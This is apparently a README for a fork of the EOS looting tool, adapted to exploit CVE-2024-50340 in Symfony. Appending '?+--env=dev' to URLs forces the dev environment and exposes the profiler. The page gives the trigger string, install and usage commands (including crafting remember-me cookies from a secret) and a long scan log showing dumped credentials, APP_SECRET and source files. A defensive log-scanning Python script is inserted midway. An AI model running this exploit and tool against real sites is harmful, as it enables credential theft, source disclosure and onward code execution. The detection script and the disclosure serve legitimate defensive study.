When the `register_argc_argv` PHP directive is set to `On`, CVE-2024-50340 allows attackers to force Symfony applications into the `dev` environment by appending `?+--env=dev` to the URL.

This vulnerability enables attackers to remotely access the Symfony `/_profiler` in configurations where such access would typically be restricted, because the `dev` environment activates the debugging tools by default. Symfony's profiler is a well-known and easily exploitable debugging component, as described by Matthieu Barjole in this Synacktiv blog post:

Using this exploit, attackers can dump the application's source code, environment variables, and request logs. If the `/_fragment` route is enabled, attackers can leak Symfony's `APP_SECRET` through the profiler's `phpinfo()` page and execute arbitrary code remotely, as detailed in this Ambionics blog post by Charles Fol:

This exploit is a fork of the original Synacktiv `/_profiler` exploit tool, modified to append `+--env=dev` to every URL the tool requests.
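As an added example (it is not part of this fork nor of EOS), the following Python script triages web server access log lines in the combined log format for the two signals a defender would look for: a query string carrying `--env`/`-e`/`--no-debug` tokens after a `+` separator, which is exactly what PHP turns into `$_SERVER['argv']` when `register_argc_argv` is on, and requests for the debug routes (`/_profiler`, `/_wdt`, `/_fragment`). The sample log lines are constructed; the option names are the ones Symfony's runtime reads from `argv`, and the first `+`-separated token is skipped because PHP treats it as `argv[0]`.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit, unquote

# Combined log format (Apache/Nginx default).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Options Symfony's runtime reads from $_SERVER['argv']; "-e" is matched loosely on purpose
# (triage prefers a false positive over a miss).
ARGV_OPTIONS = ("--env", "--no-debug", "-e")
DEBUG_ROUTES = ("/_profiler", "/_wdt", "/_fragment")


def argv_injection_tokens(query: str) -> List[str]:
    """Reproduce PHP's register_argc_argv split: the raw query string is cut on '+',
    the first token plays argv[0] and is dropped, then each token is percent-decoded."""
    tokens = [unquote(t) for t in query.split("+")][1:]
    return [t for t in tokens if t.startswith(ARGV_OPTIONS)]


def analyse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    findings = []
    injected = argv_injection_tokens(parts.query)
    if injected:
        findings.append("argv injection via query string: %s" % injected)
    if parts.path.startswith(DEBUG_ROUTES):
        findings.append("debug route requested: %s" % parts.path)
    if not findings:
        return None
    return {"ip": m["ip"], "target": m["target"], "status": m["status"], "findings": findings}


def scan_log(lines) -> List[dict]:
    return [r for r in (analyse_line(l) for l in lines) if r]


# Constructed sample: one benign search with '+' as spaces, two suspicious requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Apr/2020:14:21:26 +0000] "GET /en/blog/ HTTP/1.1" 200 5123',
    '203.0.113.5 - - [23/Apr/2020:14:21:27 +0000] "GET /en/blog/?+--env=dev HTTP/1.1" 200 9876',
    '203.0.113.5 - - [23/Apr/2020:14:21:28 +0000] "GET /_profiler/phpinfo?+--env=dev HTTP/1.1" 200 41230',
    '198.51.100.9 - - [23/Apr/2020:14:22:01 +0000] "GET /en/blog/search?q=cats+and+dogs HTTP/1.1" 200 3001',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Note that a `%2B` in the query string is not split by PHP (only a literal `+` is), which the raw-split-then-decode order above preserves; a `+` used as a space in an ordinary search query produces no finding.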
- Initial Proof of Concept (POC): https://github.com/Nyamort/CVE-2024-50340
- Vulnerability reported by Vladimir Dusheyko
- aevy-syn: Enemies Of Symfony (EOS) author.
EOS loots information from a Symfony target in debug mode:

| Section | Description |
|---|---|
| General | Get general information about the target. |
| Phpinfo | Extract Symfony environment variables from the exposed phpinfo(). |
| Routes | Get the list of registered routes. |
| Request logs | Look for credentials in POST request logs. |
| Project files | Retrieve project files (configuration, database, etc.) based on a wordlist. |
| Sources | Extract the application source code. |
| Cookies | Craft Remember Me cookies. |
More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.
Note that this tool does not exploit any Symfony vulnerability. The profiler is a useful component for developers, and EOS simply takes advantage of misconfigured Symfony applications. In fact, the profiler documentation prominently warns developers:

> Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.
Thanks to all the Symfony team for their awesome work!
Tested on Python >= 3.7.

```sh
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos
```
```
usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...

███████╗ ██████╗ ███████╗
██╔════╝██╔═══██╗██╔════╝
█████╗  ██║   ██║███████╗
██╔══╝  ██║   ██║╚════██║
███████╗╚██████╔╝███████║  Enemies Of Symfony
╚══════╝ ╚═════╝ ╚══════╝  v1.1

positional arguments:
  {scan,sources,get,creds,cookies}
    scan                perform a full scan
    sources             download application source code
    get                 download a file from the application
    creds               extract credentials from request logs
    cookies             craft remember me cookies with a great lifetime

optional arguments:
  -h, --help            show this help message and exit
  -V, --version         display version info
  -v, --verbose         increase verbosity
  --no-colors           disable colors in output

examples:
  eos scan http://localhost
  eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
  eos get http://localhost config/services.yaml
  eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629
```
```
$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day
[+] Info
[!] Symfony 5.0.1
[!] PHP 7.3.11-1~deb10u1
[!] Environment: dev
[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!]   jane_admin: kitten [ROLE_ADMIN]
[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!]   APP_ENV: dev
[!]   APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!]   DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!]   MAILER_URL: null://localhost
[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!]   composer.lock
[!]   composer.json
[!]   config/bundles.php
[!]   config/bootstrap.php
[!]   config/packages/assets.yaml
[!]   config/packages/cache.yaml
[!]   config/packages/dev/debug.yaml
[!]   config/packages/dev/monolog.yaml
[!]   config/packages/dev/routing.yaml
[!]   config/packages/dev/swiftmailer.yaml
[!]   config/packages/dev/web_profiler.yaml
[!]   config/packages/doctrine_migrations.yaml
[!]   config/packages/doctrine.yaml
[!]   config/packages/framework.yaml
[!]   config/packages/html_sanitizer.yaml
[!]   config/packages/prod/doctrine.yaml
[!]   config/packages/prod/monolog.yaml
[!]   config/packages/prod/routing.yaml
[!]   config/packages/prod/webpack_encore.yaml
[!]   config/packages/routing.yaml
[!]   config/packages/security.yaml
[!]   config/packages/sensio_framework_extra.yaml
[!]   config/packages/swiftmailer.yaml
[!]   config/packages/test/dama_doctrine_test_bundle.yaml
[!]   config/packages/test/framework.yaml
[!]   config/packages/test/monolog.yaml
[!]   config/packages/test/routing.yaml
[!]   config/packages/test/security.yaml
[!]   config/packages/test/swiftmailer.yaml
[!]   config/packages/test/twig.yaml
[!]   config/packages/test/validator.yaml
[!]   config/packages/test/webpack_encore.yaml
[!]   config/packages/test/web_profiler.yaml
[!]   config/packages/translation.yaml
[!]   config/packages/twig.yaml
[!]   config/packages/validator.yaml
[!]   config/packages/webpack_encore.yaml
[!]   config/routes/annotations.yaml
[!]   config/routes/dev/framework.yaml
[!]   config/routes/dev/web_profiler.yaml
[!]   config/routes.yaml
[!]   config/services.yaml
[!]   data/database.sqlite
[!]   data/database_test.sqlite
[!]   package.json
[!]   public/index.php
[!]   public/robots.txt
[!]   README.md
[!]   src/Kernel.php
[!]   symfony.lock
[!]   var/cache/dev/url_generating_routes.php
[!]   var/cache/dev/url_matching_routes.php
[!]   var/log/dev.log
[+] Routes
[!] Found the following routes:
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/new
[!]   /{_locale}/admin/post/{id}
[!]   /{_locale}/admin/post/{id}/edit
[!]   /{_locale}/admin/post/{id}/delete
[!]   /{_locale}/blog/
[!]   /{_locale}/blog/rss.xml
[!]   /{_locale}/blog/page/{page}
[!]   /{_locale}/blog/posts/{slug}
[!]   /{_locale}/blog/comment/{postSlug}/new
[!]   /{_locale}/blog/search
[!]   /{_locale}/login
[!]   /{_locale}/logout
[!]   /{_locale}/profile/edit
[!]   /{_locale}/profile/change-password
[!]   /{_locale}
[+] Project sources
[!] Found the following source files:
[!]   src/Command/AddUserCommand.php
[!]   src/Command/DeleteUserCommand.php
[!]   src/Command/ListUsersCommand.php
[!]   src/Controller/Admin/BlogController.php
[!]   src/Controller/BlogController.php
[!]   src/Controller/SecurityController.php
[!]   src/Controller/UserController.php
[!]   src/DataFixtures/AppFixtures.php
[!]   src/Entity/Comment.php
[!]   src/Entity/Post.php
[!]   src/Entity/Tag.php
[!]   src/Entity/User.php
[!]   src/EventSubscriber/CheckRequirementsSubscriber.php
[!]   src/EventSubscriber/CommentNotificationSubscriber.php
[!]   src/EventSubscriber/ControllerSubscriber.php
[!]   src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!]   src/Events/CommentCreatedEvent.php
[!]   src/Form/CommentType.php
[!]   src/Form/DataTransformer/TagArrayToStringTransformer.php
[!]   src/Form/PostType.php
[!]   src/Form/Type/ChangePasswordType.php
[!]   src/Form/Type/DateTimePickerType.php
[!]   src/Form/Type/TagsInputType.php
[!]   src/Form/UserType.php
[!]   src/Kernel.php
[!]   src/Pagination/Paginator.php
[!]   src/Repository/PostRepository.php
[!]   src/Repository/TagRepository.php
[!]   src/Repository/UserRepository.php
[!]   src/Security/PostVoter.php
[!]   src/Twig/AppExtension.php
[!]   src/Twig/SourceCodeExtension.php
[!]   src/Utils/Markdown.php
[!]   src/Utils/MomentFormatConverter.php
[!]   src/Utils/Slugger.php
[!]   src/Utils/Validator.php
[+] Saving files to results
[+] Saved 88 files
[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13
```